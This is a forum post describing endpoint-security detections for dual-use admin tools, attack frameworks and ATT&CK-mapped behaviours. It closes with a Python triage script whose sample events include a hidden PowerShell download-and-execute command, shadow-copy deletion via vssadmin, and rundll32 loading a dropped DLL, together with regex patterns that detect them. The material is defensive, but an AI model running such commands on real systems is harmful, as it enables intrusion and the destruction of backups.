
Sigma

In-depth Malware Descriptions

Posted 05-04-2021, 12:55 AM
Potentially Unwanted Applications

App/IObitUn-A (PUA_IMPAIR_IOBIT_UNINSTALLER) + App/IObitUnlo-A (PUA_IMPAIR_IOBIT_UNLOCKER)
IObit's Uninstaller (https://www.iobit.com/en/advanceduninstaller.php) can be used to force remove programs from systems. This is a legitimate administrator application, but it has been used maliciously by threat actors to disable or remove security and logging software.

App/NirCmd-Gen (PUA_EXECUTION_NIRCMD)
NirSoft's NirCmd (https://www.nirsoft.net/utils/nircmd.html) is a small but powerful administrator tool to perform useful tasks on a device from the command line. With NirCmd it's possible to modify registry keys, open and close the CD-ROM drive, manipulate the clipboard, and restart services. As an administrative tool, it may exist legitimately within the network; however, if it is not a tool that you are familiar with or actively using, it's possible that a threat actor may be employing its features.

App/Metasplt-F (ATK_METASPLOIT)
The Metasploit Framework (https://www.metasploit.com/) is commonly used by penetration testers to exploit vulnerabilities, deploy stagers to gain remote control, and drop payloads designed to test the abilities of security software. As a free and open-source penetration testing application it is often used by pen-testers to explore an environment's security. If you are performing a penetration test currently, you should check the detections with the tester to ensure they are related. If you are not currently performing a penetration test, you should investigate the alerts immediately.

App/PrcHacker-A (PUA_IMPAIR_PROCESS_HACKER)
Process Hacker (https://processhacker.sourceforge.io/) is a tool similar to Microsoft's Task Manager or Process Explorer. It is a very powerful administrator tool allowing users to find file hooks, network connections, disk usage, and more. It can also be used to dump the memory of a running process and to kill unprotected security software. Process Hacker has been seen in the advanced stages of attacks, where it is used by an attacker with remote access (e.g. over RDP) to terminate security and logging software prior to deploying a malicious payload, often ransomware. Its unaccounted presence is a strong indication that an active, ongoing, coordinated attack is taking place.

App/PsKill-Gen (PUA_IMPAIR_PSKILL)
PsKill (https://docs.microsoft.com/en-us/sysinte...ads/pskill) is an administrative tool created by Sysinternals, now part of Microsoft. The tool can be used by administrators to kill local or remote processes. In the wrong hands, this tool can be used to disable security or logging software prior to deploying a malicious payload. Its unaccounted presence is a strong indication that an active, ongoing, coordinated attack is taking place.

App/PsExec-Gen (PUA_EXECUTION_PSEXEC)
PsExec (https://docs.microsoft.com/en-us/sysinte...ads/psexec) is an administrative tool created by Sysinternals, now part of Microsoft. The tool can be used by administrators to execute processes locally or remotely, as administrator or as a system account. It is often used for installing applications or running scripts across multiple devices. In the wrong hands, these features can be used to deploy malware rapidly across an environment.

App/MimKatz-A (ATK_MIMIKATZ)
Mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) is a very powerful tool that can be used to extract plain-text passwords, certificates, Kerberos tickets, and more. This tool is commonly deployed by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary may be deploying it. Since Mimikatz can be used to obtain administrator credentials from devices it is seen in almost all modern attacks to enable the threat actor to move laterally to other devices, disable security or logging software, or deploy payloads with higher permission to cause greater damage.

App/Equation-AB (PUA_LATERAL_SMBTOUCH_NETWORK_CAPTURE)
How Abused: Part of the Equation Group attack kit, used in conjunction with Eternal Blue.
Category: Network Reconnaissance
Also: App/Equation-AA



AMSI Detections

AMSI/BloodH-B (ACTIVE_ATK_MISC)
Bloodhound (https://bloodhound.readthedocs.io/en/latest/index.html) is a tool used by both blue and red teams in order to gain a deeper understanding of privilege relationships in an Active Directory environment. For example: the active adversary was able to hack into Bob (who is a member of Server Admins), but the active adversary would like to target an account that belongs to the Domain Admins group. This tool can show diagrammatically where the active adversary should laterally move in order to obtain the higher privileges.

AMSI/Mimikatz (ACTIVE_ATK_CREDS)
Mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) is a very powerful tool that can be used to extract plain-text passwords, certificates, Kerberos tickets, and more. This tool is commonly deployed by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary may be deploying it. Since Mimikatz can be used to obtain administrator credentials from devices it is seen in almost all modern attacks to enable the threat actor to move laterally to other devices, disable security or logging software, or deploy payloads with higher permission to cause greater damage.

ATK/Cobalt (ATK_COBALTSTRIKE)
AMSI/Cobalt-A is a runtime detection for Cobalt Strike (https://www.cobaltstrike.com/). This is a penetration testing tool and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying it. For example, the Conti group (as well as many others) are known to use these tools during their attacks.

HPmal/MSFPShl (ACTIVE_ATK_COBALTSTRIKE)
HPmal/MSFPShl is a runtime detection for Metasploit Framework's (https://www.metasploit.com/) PowerShell stagers; it can also detect Cobalt Strike (https://www.cobaltstrike.com/) stagers. These are penetration testing tools and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying them. For example, the Conti group (as well as many others) are known to use these tools during their attacks.

HPmal/WMIPOW-? (ACTIVE_PAYLOAD_MINER)
Powershell scripts related to coin miners called from WMI.
WMI is a native Windows utility used by administrators to automate tasks and remotely manage systems.
This detection indicates the malware has its persistence in WMI DB.
Note: Manual intervention is required to remove these malicious scripts - investigate the WMI DB entries, identify, and then remove.

Mal/Chopper-A (ATK_WEBSHELL)
Commonly called "China Chopper", it is a small web file written in ASPX, PHP, JSP, and other languages that has been around for about 10 years. It is a very simple web file designed to accept HTTP POST commands and execute them directly on the server. Because of its size and flexibility, it is a very stealthy tool. It was most recently used during the Exchange exploits of March 2021. China Chopper is used to obtain a reverse shell, file access, and process execution. https://www.zdnet.com/article/hafniums-c...backdoors/

ATK/Empire-D (ATK_POWERSHELL_EMPIRE)
Powershell Empire (https://www.powershellempire.com/) is a collection of tools used post-exploitation. The toolkit is sometimes used by penetration testers and as such may be used legitimately. If, however, you are not performing a penetration test at this time, it is highly likely that an active adversary is deploying it. Powershell Empire allows them to communicate securely with devices, maintain persistence, and deploy additional modules such as mimikatz (https://github.com/gentilkiwi/mimikatz/wiki) or keyloggers. Ransomware such as Lockbit has been known to use modified Powershell Empire scripts to remotely control devices and deploy the payloads.

Troj/Meter-F (ATK_METASPLOIT)
Meterpreter (https://www.offensive-security.com/metas...terpreter/) is an extension written for the Metasploit Framework (https://www.metasploit.com/). It is commonly used by penetration testers to perform in-memory injections and establish a stager on a target device. As a free and open-source penetration testing application it is often used by pen-testers to explore an environment's security. If you are performing a penetration test currently, you should check the detections with the tester to ensure they are related. If you are not currently performing a penetration test, you should investigate the alerts immediately. Attacks using modified Meterpreter tools include those by the Conti group.



HMPA Detections

Dynamic Shellcode/HeapHeapProtect (ACTIVE_STAGING)
Dynamic Shellcode or HeapHeapProtect detects code running in dynamic memory, in RUNDLL32.EXE and REGSVR32.EXE, and prevents it from manipulating other dynamic memory. This proactively helps against many backdoor tools, trojans, and ransomware families. Seeing these alerts normally means that an active adversary is on the device attempting to attack it or other systems within your network.

AMSIGuard
An AMSIGuard detection will occur if a process attempts to disable the AMSI (https://docs.microsoft.com/en-us/windows...ace-portal) integration of Windows. AMSI, the Antimalware Scan Interface, allows security vendors to see and scan executing obfuscated or encrypted code just before it runs. Recent ransomware attacks have attempted to disable AMSI to lessen the chance of security software detecting their activity before deploying the payloads.

CredGuard
CredGuard detections are triggered when an unauthorized process is attempting to access the LSASS memory on a device. This area of memory is used to store the credentials, certificates, keys, and tokens of users.

HollowProcess (ACTIVE_HOLLOWING)
A HollowProcess detection will fire up when a process is subjected to a "process hollowing technique". This is a technique wherein a trusted application - like explorer.exe or svchost.exe - is loaded on the system solely to act as a container for hostile code. A hollow process is typically created in a suspended state, then its memory is unmapped and replaced with malicious code. Similar to code injection, execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis.



Behaviour Detections

Exec_1a (MITRE ATT&CK T1059)
Exec_1c (MITRE ATT&CK T1059)
Exec_5a (MITRE ATT&CK T1197)
Exec_6a (MITRE ATT&CK T1059.001) (ACTIVE_POWERSHELL_DOWNLOAD)

Malicious PowerShell activity. Adversaries can make use of PowerShell to perform malicious actions against an organization. Some common activities include performing reconnaissance that will reveal potential targets (servers, crown jewels, etc.), or executing malicious commands to continue their attack chain. An interesting behavior of adversaries is to make use of PowerShell to download and execute malicious executables in memory; they do this to bypass anti-malware checking on files written to or read from the disk.

Some examples of when this rule is likely to fire up:
  • PowerShell commands that will try to download and execute modules related to crypto-mining attacks.
  • PowerShell commands launched using macros from a malicious Excel file.

Exec_7a (MITRE ATT&CK T1220)
Exec_9a (MITRE ATT&CK T1117)
Exec_12b (MITRE ATT&CK T1086)
Exec_13a
Exec_17a (ACTIVE_POWERSHELL_REMOTEEXECUTION)
This detection will fire up to protect the endpoint from PowerShell dynamic execution in which the code that is intended to be executed comes from open-source repositories such as GitHub and Pastebin.

Exec_21a (ACTIVE_POWERSHELL_LEMONDUCK)
A rule to block the Lemon Duck coin miner -- which is important for older Windows endpoints & servers that do not support AMSI scanning at the OS level.

Exec_27a (T1059.001)(ACTIVE_ATK_COBALTSTRIKE)
Adversaries may abuse PowerShell commands and scripts for execution.
A common scenario would be this rule firing up when an adversary tries to run Cobalt activity.

Exec_28a (MITRE ATT&CK T1059.001)(ACTIVE_PAYLOAD_MINER)
Malicious PowerShell activity. Read Exec_6a (above) for a general intro on how adversaries can abuse PowerShell. This particular rule will fire for PowerShell commands that will try to download and execute modules related to crypto-mining attacks.
Note: Interestingly, in most cases the Exec_6a rule will fire up before Exec_28a on a single machine.

Persist_12a

Evade_7a
Evade_8a
Evade_23a (MITRE ATT&CK T1218.011)(ACTIVE_ATK_KOADIC)

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor the execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.

This detection will trigger and block if a rundll32 process runs malicious code (exe/dll) that belongs to the Koadic toolset. Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.

Lateral_1b (MITRE ATT&CK T1105)
LOLBIN - Living off the Land Binary. Usage of Windows binaries to hide malicious activity.

Lateral_2a!s

C2_11a (T1071.001)(ACTIVE_C2_LOLBIN)

C2_12a!s (T1071.001)(ACTIVE_C2_PAYLOAD)
Adversaries will connect to their command-and-control (C2) servers to get additional commands for the remote systems to execute. This rule will fire up if the detected C2 communications are making use of Web Protocols (HTTP/S). One of the main reasons why they utilize this technique is that most organizations allow HTTP/S traffic (browsing and doing business on the internet).

Impact_2a!s (MITRE ATT&CK T1490)
Could indicate the use of VSSAdmin to delete or manipulate volume shadow copies, a Microsoft service that allows system rollback. Changing the size of volume shadow copies to something very small can have a similar effect to deleting (Ryuk ransomware used this successfully).
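As an added example (not from the original post, and not the vendor's detection logic), a small Python triage script that approximates three of the behaviour rules described above, Exec_6a (PowerShell download-and-execute), Evade_23a (rundll32 proxying a dropped DLL) and Impact_2a (vssadmin shadow copy deletion or resizing), over constructed Sysmon-style process-creation events. The rule regexes, host names, paths and command lines are all assumptions made up for the example.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# every value here is made up for this example.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')"},
    {"host": "ws01", "image": "rundll32.exe", "cmd": "rundll32.exe C:\\Users\\Public\\update.dll,DllRegisterServer"},
    {"host": "srv02", "image": "vssadmin.exe", "cmd": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "srv02", "image": "vssadmin.exe",
     "cmd": "vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB"},
    {"host": "ws03", "image": "powershell.exe", "cmd": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"host": "ws03", "image": "rundll32.exe", "cmd": "rundll32.exe shell32.dll,Control_RunDLL"},
]

# Hypothetical approximations of the rules named in the post; not the vendor's real logic.
DOWNLOAD_CUE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)
EXEC_CUE = re.compile(r"\bIEX\b|Invoke-Expression|-EncodedCommand|\s-e(nc)?\s", re.I)
# A DLL argument loaded from a user-writable location rather than a Windows system directory.
USER_WRITABLE_DLL = re.compile(r"[A-Z]:\\(Users|ProgramData|Temp)\\[^\s,]+\.dll", re.I)
SHADOW_DELETE = re.compile(r"\bdelete\s+shadows\b", re.I)
SHADOW_RESIZE = re.compile(r"\bresize\s+shadowstorage\b.*/maxsize=", re.I)


def classify(event):
    """Return the list of rule labels that match one process-creation event."""
    image, cmd = event["image"].lower(), event["cmd"]
    hits = []
    # Exec_6a style: PowerShell that fetches content and immediately runs it in memory.
    if image == "powershell.exe" and DOWNLOAD_CUE.search(cmd) and EXEC_CUE.search(cmd):
        hits.append("Exec_6a")
    # Evade_23a style: rundll32 proxying a DLL dropped outside the Windows directory.
    if image == "rundll32.exe" and USER_WRITABLE_DLL.search(cmd):
        hits.append("Evade_23a")
    # Impact_2a style: vssadmin removing or starving volume shadow copies.
    if image == "vssadmin.exe" and (SHADOW_DELETE.search(cmd) or SHADOW_RESIZE.search(cmd)):
        hits.append("Impact_2a")
    return hits


def triage(events):
    """Map each host to the distinct rules it tripped, so an analyst sees the chain per device."""
    per_host = {}
    for ev in events:
        for rule in classify(ev):
            per_host.setdefault(ev["host"], set()).add(rule)
    return {h: sorted(r) for h, r in per_host.items()}

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))
```

A host that trips Exec_6a and Evade_23a together, as ws01 does here, matches the post's description of an active adversary staging code, whereas the two benign ws03 events produce no hits.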